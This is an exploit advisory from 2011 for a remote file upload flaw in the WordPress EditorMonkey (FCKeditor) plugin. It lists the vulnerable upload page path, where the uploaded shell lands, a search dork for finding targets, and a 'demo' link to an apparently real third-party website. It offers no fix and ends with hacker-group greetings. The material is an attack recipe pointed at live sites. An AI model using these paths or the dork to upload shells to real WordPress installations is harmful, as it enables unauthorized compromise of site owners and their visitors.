############################################################################################################# ## WordPress EditorMonkey (FCKeditor) Remote File Upload ## ## Author : kaMtiEz (kamtiez@exploit-id.com) ## ## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id ## ## Date : 14 May, 2011 ## ############################################################################################################# [ Software Information ] [+] Vendor : http://rajprasad.wordpress.com/plugins/editormonkey/ [+] Download : http://www.kumovies.com/wp-content/plugins/editormonkey.tar.gz [+] version : 2.5 or lower maybe also affected [+] Vulnerability : File Upload [+] Dork : "CiHuY" [+] LOCATION : INDONESIA - JOGJA ############################################################################################################# [ Vulnerable File ] http://127.0.0.1/[kaMtiEz]/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html [ Shell ] http://127.0.0.1/[kaMtiEz]/UserFiles/YourFile.txt [ DEMO ] http://ideashaveconsequences.org/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html [ FIX ] dunno :"> ############################################################################################################# [ Thx TO ] [+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9 [+] Tukulesto,arianom,el-farhatz,Jundab,Ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack [+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,El k4mpr3t0 [+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,dan teman2 semuanya yang saya tak bisa sebutkan satu2 :D [ NOTE ] [+] For Wantexz .. Get Well Soon My Friends :) [+] Special Thx to my brotherhood in DejavuNet :D [+] Jangan Takut , Luka Pasti Akan Sembuh :) [ QUOTE ] [+] INDONESIANHAXOR still r0x [+] nothing secure ..